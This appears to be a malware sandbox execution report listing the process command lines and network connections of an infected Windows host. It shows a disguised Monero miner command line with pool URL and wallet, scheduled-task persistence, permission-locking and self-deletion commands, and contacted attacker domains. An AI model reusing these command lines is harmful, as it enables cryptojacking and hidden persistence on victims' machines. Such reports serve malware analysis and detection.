C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631133684 /qn CAMPAIGN=""654"" " CAMPAIGN="654"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 9617976DD5BFF0ABD59B665E366AD692

C:\Windows\SysWOW64\taskkill.exe

"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 90C8B298AA232F6EAA7F9A96E027AE00 E Global\MSI0000

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\system32\wbem\WMIADAP.EXE

wmiadap.exe /F /T /R

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe

"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" /update

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s seclogon

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe

"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe"

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Roaming\ffebvvt

C:\Users\Admin\AppData\Roaming\ffebvvt

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe"

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Local\Temp\BB94.exe

C:\Users\Admin\AppData\Local\Temp\BB94.exe

C:\Users\Admin\AppData\Local\Temp\C411.exe

C:\Users\Admin\AppData\Local\Temp\C411.exe

C:\Users\Admin\AppData\Local\Temp\D3E1.exe

C:\Users\Admin\AppData\Local\Temp\D3E1.exe

C:\Users\Admin\AppData\Local\Temp\D3E1.exe

C:\Users\Admin\AppData\Local\Temp\D3E1.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\ea3e2026-496c-43c8-a1a7-2bd1df363a74" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\D3E1.exe

"C:\Users\Admin\AppData\Local\Temp\D3E1.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\D3E1.exe

"C:\Users\Admin\AppData\Local\Temp\D3E1.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\E97D.exe

C:\Users\Admin\AppData\Local\Temp\E97D.exe

C:\Users\Admin\AppData\Local\0a5fa132-bc13-4f09-8ac8-a255db3f0598\build2.exe

"C:\Users\Admin\AppData\Local\0a5fa132-bc13-4f09-8ac8-a255db3f0598\build2.exe"

C:\Users\Admin\AppData\Local\0a5fa132-bc13-4f09-8ac8-a255db3f0598\build2.exe

"C:\Users\Admin\AppData\Local\0a5fa132-bc13-4f09-8ac8-a255db3f0598\build2.exe"

C:\Users\Admin\AppData\Local\0a5fa132-bc13-4f09-8ac8-a255db3f0598\build3.exe

"C:\Users\Admin\AppData\Local\0a5fa132-bc13-4f09-8ac8-a255db3f0598\build3.exe"

C:\Users\Admin\AppData\Local\0a5fa132-bc13-4f09-8ac8-a255db3f0598\build3.exe

"C:\Users\Admin\AppData\Local\0a5fa132-bc13-4f09-8ac8-a255db3f0598\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Users\Admin\AppData\Local\Temp\16D8.exe

C:\Users\Admin\AppData\Local\Temp\16D8.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\0a5fa132-bc13-4f09-8ac8-a255db3f0598\build2.exe" & del C:\ProgramData\*.dll & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im build2.exe /f

C:\Windows\SysWOW64\timeout.exe

timeout /t 6

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\E97D.exe"

C:\Users\Admin\AppData\Local\Temp\oG0B2Yu8gl.exe

"C:\Users\Admin\AppData\Local\Temp\oG0B2Yu8gl.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /T 10 /NOBREAK

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe"

C:\Users\Admin\AppData\Local\Temp\4EE1.exe

C:\Users\Admin\AppData\Local\Temp\4EE1.exe

C:\Users\Admin\AppData\Local\Temp\6076.exe

C:\Users\Admin\AppData\Local\Temp\6076.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im 4EE1.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\4EE1.exe" & del C:\ProgramData\*.dll & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im 4EE1.exe /f

C:\Windows\SysWOW64\timeout.exe

timeout /t 6

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\6076.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /T 10 /NOBREAK

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe"

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Roaming\ffebvvt

C:\Users\Admin\AppData\Roaming\ffebvvt

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Local\ea3e2026-496c-43c8-a1a7-2bd1df363a74\D3E1.exe

C:\Users\Admin\AppData\Local\ea3e2026-496c-43c8-a1a7-2bd1df363a74\D3E1.exe --Task

C:\Users\Admin\AppData\Local\ea3e2026-496c-43c8-a1a7-2bd1df363a74\D3E1.exe

C:\Users\Admin\AppData\Local\ea3e2026-496c-43c8-a1a7-2bd1df363a74\D3E1.exe --Task

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Roaming\ffebvvt

C:\Users\Admin\AppData\Roaming\ffebvvt

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

Network

Country Destination Domain Proto
US 8.8.8.8:53 hsiens.xyz udp
US 172.67.142.91:80 hsiens.xyz tcp
US 8.8.8.8:53 www.listincode.com udp
US 144.202.76.47:443 www.listincode.com tcp
US 8.8.8.8:53 safialinks.com udp
US 162.0.213.132:80 safialinks.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 a.goatgame.co udp
US 104.21.79.144:443 a.goatgame.co tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 startupmart.bar udp
US 104.21.37.182:443 startupmart.bar tcp
US 8.8.8.8:53 statuse.digitalcertvalidation.com udp
US 72.21.91.29:80 statuse.digitalcertvalidation.com tcp
US 8.8.8.8:53 wheelllc.bar udp
US 172.67.136.53:443 wheelllc.bar tcp
US 8.8.8.8:53 qwertys.info udp
US 104.21.20.198:443 qwertys.info tcp
US 8.8.8.8:53 yelty.info udp
US 104.21.17.186:443 yelty.info tcp
DE 88.99.66.31:443 iplogger.org tcp
US 8.8.8.8:53 gheorghip.tumblr.com udp
US 74.114.154.22:443 gheorghip.tumblr.com tcp
DE 88.99.66.31:443 iplogger.org tcp
US 8.8.8.8:53 iplogger.com udp
DE 88.99.66.31:443 iplogger.com tcp
US 104.21.37.182:443 startupmart.bar tcp
US 8.8.8.8:53 google.vrthcobj.com udp
US 8.8.8.8:53 google.vrthcobj.com udp
JP 34.97.69.225:53 google.vrthcobj.com udp
US 8.8.8.8:53 liveme31.com udp
US 172.67.132.120:80 liveme31.com tcp
SC 185.215.113.104:18754 tcp
N/A 127.0.0.1:49718 tcp
N/A 127.0.0.1:49720 tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 connectini.net udp
US 162.0.210.44:443 connectini.net tcp
DE 88.99.66.31:443 iplogger.com tcp
DE 88.99.66.31:443 iplogger.com tcp
US 8.8.8.8:53 phonefix.bar udp
US 172.67.131.66:443 phonefix.bar tcp
US 8.8.8.8:53 cleaner-partners.biz udp
RU 46.8.29.181:80 cleaner-partners.biz tcp
RU 45.9.20.20:13441 tcp
SC 185.215.113.104:18754 tcp
US 8.8.8.8:53 real-web-online.bar udp
US 172.67.159.99:443 real-web-online.bar tcp
US 8.8.8.8:53 live.goatgame.live udp
US 104.21.70.98:443 live.goatgame.live tcp
US 172.67.131.66:443 phonefix.bar tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.13.31:443 api.ip.sb tcp
US 74.114.154.22:443 gheorghip.tumblr.com tcp
US 8.8.8.8:53 safialinks.com udp
US 162.0.213.132:80 safialinks.com tcp
DE 162.55.179.90:80 162.55.179.90 tcp
US 8.8.8.8:53 www.iyiqian.com udp
RU 103.155.92.58:80 www.iyiqian.com tcp
US 8.8.8.8:53 requestimmersive.com udp
US 162.0.220.187:80 requestimmersive.com tcp
US 8.8.8.8:53 iplogger.org udp
DE 88.99.66.31:443 iplogger.org tcp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 api.ip.sb udp
US 208.95.112.1:80 ip-api.com tcp
US 104.26.12.31:443 api.ip.sb tcp
US 8.8.8.8:53 a.upstloans.net udp
US 172.67.179.248:443 a.upstloans.net tcp
US 8.8.8.8:53 google.com udp
US 104.26.12.31:443 api.ip.sb tcp
NL 142.250.179.132:80 www.google.com tcp
US 8.8.8.8:53 connectini.net udp
US 162.0.210.44:443 connectini.net tcp
US 162.0.210.44:443 connectini.net tcp
US 8.8.8.8:53 b.upstloans.net udp
US 104.21.31.210:443 b.upstloans.net tcp
US 162.0.220.187:80 requestimmersive.com tcp
US 172.67.179.248:443 b.upstloans.net tcp
US 162.0.210.44:443 connectini.net tcp
UA 194.145.227.159:80 194.145.227.159 tcp
US 172.67.179.248:443 b.upstloans.net tcp
US 8.8.8.8:53 source3.boys4dayz.com udp
US 8.8.8.8:53 htagzdownload.pw udp
US 172.67.148.61:443 source3.boys4dayz.com tcp
US 8.8.8.8:53 aa.goatgamea.com udp
US 104.21.62.66:443 aa.goatgamea.com tcp
US 8.8.8.8:53 www.profitabletrustednetwork.com udp
US 8.8.8.8:53 bb.goatgamed.com udp
US 104.21.30.211:443 bb.goatgamed.com tcp
DE 88.99.66.31:443 iplogger.org tcp
US 8.8.8.8:53 a.goatgame.co udp
US 172.67.146.70:443 a.goatgame.co tcp
US 8.8.8.8:53 fsstoragecloudservice.com udp
BG 111.90.156.46:80 fsstoragecloudservice.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
US 8.8.8.8:53 cleaner-partners.biz udp
RU 46.8.29.181:80 cleaner-partners.biz tcp
US 8.8.8.8:53 venetrigni.com udp
US 3.209.145.5:443 venetrigni.com tcp
US 3.209.145.5:443 venetrigni.com tcp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 hanner-blobal.com udp
US 34.196.146.107:443 hanner-blobal.com tcp
US 34.196.146.107:443 hanner-blobal.com tcp
US 8.8.8.8:53 mj22.xyz udp
US 104.21.27.207:80 mj22.xyz tcp
US 104.21.27.207:80 mj22.xyz tcp
US 104.21.27.207:443 mj22.xyz tcp
RU 46.8.29.181:80 cleaner-partners.biz tcp
US 8.8.8.8:53 s10.histats.com udp
FR 46.105.201.240:443 s10.histats.com tcp
FR 46.105.201.240:443 s10.histats.com tcp
US 104.21.27.207:443 mj22.xyz tcp
US 104.21.27.207:443 mj22.xyz tcp
US 8.8.8.8:53 s4.histats.com udp
CA 192.99.0.58:443 s4.histats.com tcp
CA 192.99.0.58:443 s4.histats.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 e.dtscout.com udp
DE 51.89.99.21:443 e.dtscout.com tcp
DE 51.89.99.21:443 e.dtscout.com tcp
US 8.8.8.8:53 t.dtscout.com udp
CA 51.161.15.92:443 t.dtscout.com tcp
CA 51.161.15.92:443 t.dtscout.com tcp
US 8.8.8.8:53 get.s-onetag.com udp
NL 65.9.83.18:443 get.s-onetag.com tcp
NL 65.9.83.18:443 get.s-onetag.com tcp
US 8.8.8.8:53 cdn.tynt.com udp
US 8.8.8.8:53 pd.sharethis.com udp
US 104.16.87.26:443 cdn.tynt.com tcp
US 104.16.87.26:443 cdn.tynt.com tcp
US 3.134.203.227:443 pd.sharethis.com tcp
US 3.134.203.227:443 pd.sharethis.com tcp
US 8.8.8.8:53 onetag-geo.s-onetag.com udp
NL 65.9.83.112:443 onetag-geo.s-onetag.com tcp
NL 65.9.83.112:443 onetag-geo.s-onetag.com tcp
US 8.8.8.8:53 geo-location.s-onetag.com udp
US 75.2.92.115:443 geo-location.s-onetag.com tcp
US 75.2.92.115:443 geo-location.s-onetag.com tcp
US 75.2.92.115:443 geo-location.s-onetag.com tcp
US 75.2.92.115:443 geo-location.s-onetag.com tcp
US 75.2.92.115:443 geo-location.s-onetag.com tcp
US 8.8.8.8:53 bcp.crwdcntrl.net udp
US 8.8.8.8:53 tags.bluekai.com udp
US 35.171.137.144:443 bcp.crwdcntrl.net tcp
US 35.171.137.144:443 bcp.crwdcntrl.net tcp
NL 104.80.225.228:443 tags.bluekai.com tcp
NL 104.80.225.228:443 tags.bluekai.com tcp
US 8.8.8.8:53 pixel.onaudience.com udp
FR 51.210.112.236:443 pixel.onaudience.com tcp
FR 51.210.112.236:443 pixel.onaudience.com tcp
US 8.8.8.8:53 t.dtscdn.com udp
US 159.203.161.83:443 t.dtscdn.com tcp
US 159.203.161.83:443 t.dtscdn.com tcp
US 8.8.8.8:53 t.sharethis.com udp
US 8.8.8.8:53 ic.tynt.com udp
US 208.100.17.187:443 ic.tynt.com tcp
US 208.100.17.187:443 ic.tynt.com tcp
US 8.8.8.8:53 data-beacons.s-onetag.com udp
NL 23.66.19.12:443 t.sharethis.com tcp
NL 23.66.19.12:443 t.sharethis.com tcp
NL 65.9.83.72:443 data-beacons.s-onetag.com tcp
NL 65.9.83.72:443 data-beacons.s-onetag.com tcp
US 8.8.8.8:53 ap.lijit.com udp
NL 72.251.249.13:443 ap.lijit.com tcp
NL 72.251.249.13:443 ap.lijit.com tcp
NL 72.251.249.13:443 ap.lijit.com tcp
US 8.8.8.8:53 match.adsrvr.org udp
US 8.8.8.8:53 de.tynt.com udp
US 208.100.17.186:443 de.tynt.com tcp
US 208.100.17.186:443 de.tynt.com tcp
US 13.248.242.197:443 match.adsrvr.org tcp
US 13.248.242.197:443 match.adsrvr.org tcp
US 8.8.8.8:53 loadus.exelator.com udp
US 8.8.8.8:53 ps.eyeota.net udp
US 8.8.8.8:53 ml314.com udp
US 52.26.6.186:443 loadus.exelator.com tcp
US 52.26.6.186:443 loadus.exelator.com tcp
US 34.231.251.31:443 ps.eyeota.net tcp
US 34.231.251.31:443 ps.eyeota.net tcp
US 3.131.104.7:443 ml314.com tcp
US 3.131.104.7:443 ml314.com tcp
US 8.8.8.8:53 p.adsymptotic.com udp
US 104.18.100.194:443 p.adsymptotic.com tcp
US 104.18.100.194:443 p.adsymptotic.com tcp
US 8.8.8.8:53 map.go.affec.tv udp
NL 65.9.83.32:443 map.go.affec.tv tcp
NL 65.9.83.32:443 map.go.affec.tv tcp
US 8.8.8.8:53 pixel.tapad.com udp
US 107.178.246.49:443 pixel.tapad.com tcp
US 107.178.246.49:443 pixel.tapad.com tcp
US 8.8.8.8:53 e.dlx.addthis.com udp
NL 104.80.225.228:443 e.dlx.addthis.com tcp
NL 104.80.225.228:443 e.dlx.addthis.com tcp
US 8.8.8.8:53 aa.agkn.com udp
GB 18.170.233.248:443 aa.agkn.com tcp
GB 18.170.233.248:443 aa.agkn.com tcp
US 8.8.8.8:53 secure.adnxs.com udp
DE 37.252.173.38:443 secure.adnxs.com tcp
DE 37.252.173.38:443 secure.adnxs.com tcp
US 8.8.8.8:53 idsync.rlcdn.com udp
US 35.190.60.146:443 idsync.rlcdn.com tcp
US 35.190.60.146:443 idsync.rlcdn.com tcp
US 8.8.8.8:53 rc.rlcdn.com udp
US 35.190.60.146:443 rc.rlcdn.com tcp
US 35.190.60.146:443 rc.rlcdn.com tcp
US 8.8.8.8:53 dp1.33across.com udp
US 208.100.17.174:443 dp1.33across.com tcp
US 208.100.17.174:443 dp1.33across.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 sync.sharethis.com udp
US 8.8.8.8:53 static.agkn.com udp
NL 65.9.83.103:443 static.agkn.com tcp
NL 65.9.83.103:443 static.agkn.com tcp
US 18.119.53.174:443 sync.sharethis.com tcp
US 18.119.53.174:443 sync.sharethis.com tcp
US 8.8.8.8:53 stags.bluekai.com udp
US 8.8.8.8:53 pippio.com udp
US 107.178.254.65:443 pippio.com tcp
US 107.178.254.65:443 pippio.com tcp
NL 104.80.225.228:443 stags.bluekai.com tcp
NL 104.80.225.228:443 stags.bluekai.com tcp
US 8.8.8.8:53 usermatch.krxd.net udp
US 3.223.81.219:443 usermatch.krxd.net tcp
US 3.223.81.219:443 usermatch.krxd.net tcp
US 8.8.8.8:53 x.dlx.addthis.com udp
NL 104.80.225.228:443 x.dlx.addthis.com tcp
NL 104.80.225.228:443 x.dlx.addthis.com tcp
US 8.8.8.8:53 beacon.krxd.net udp
US 54.156.89.184:443 beacon.krxd.net tcp
US 54.156.89.184:443 beacon.krxd.net tcp
US 8.8.8.8:53 cm.g.doubleclick.net udp
NL 142.250.179.130:443 cm.g.doubleclick.net tcp
NL 142.250.179.130:443 cm.g.doubleclick.net tcp
US 8.8.8.8:53 varmisende.com udp
PA 186.74.208.84:80 varmisende.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 fernandomayol.com udp
US 8.8.8.8:53 connect-metrics-collector.s-onetag.com udp
US 75.2.13.80:443 connect-metrics-collector.s-onetag.com tcp
US 75.2.13.80:443 connect-metrics-collector.s-onetag.com tcp
US 8.8.8.8:53 sanctam.net udp
SE 185.65.135.234:58899 sanctam.net tcp
US 8.8.8.8:53 bitbucket.org udp
US 104.192.141.1:443 bitbucket.org tcp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
NL 51.15.55.100:14433 xmr-eu2.nanopool.org tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 collect.installeranalytics.com udp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 8.8.8.8:53 pastebin.com udp
US 104.23.99.190:443 pastebin.com tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
NL 51.15.54.102:14433 xmr-eu1.nanopool.org tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 8.8.8.8:53 nextlytm.com udp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 8.8.8.8:53 people4jan.com udp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 8.8.8.8:53 asfaltwerk.com udp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
CA 192.99.0.58:443 s4.histats.com tcp
CA 192.99.0.58:443 s4.histats.com tcp
DE 51.89.99.21:443 t.dtscout.com tcp
DE 51.89.99.21:443 t.dtscout.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
FR 51.210.112.236:443 pixel.onaudience.com tcp
FR 51.210.112.236:443 pixel.onaudience.com tcp
US 159.203.161.83:443 t.dtscdn.com tcp
US 159.203.161.83:443 t.dtscdn.com tcp
US 8.8.8.8:53 tags.crwdcntrl.net udp
NL 65.9.83.9:443 tags.crwdcntrl.net tcp
NL 65.9.83.9:443 tags.crwdcntrl.net tcp
US 8.8.8.8:53 spl.zeotap.com udp
US 104.22.25.87:443 spl.zeotap.com tcp
US 104.22.25.87:443 spl.zeotap.com tcp
US 8.8.8.8:53 mwzeom.zeotap.com udp
US 172.67.13.182:443 mwzeom.zeotap.com tcp
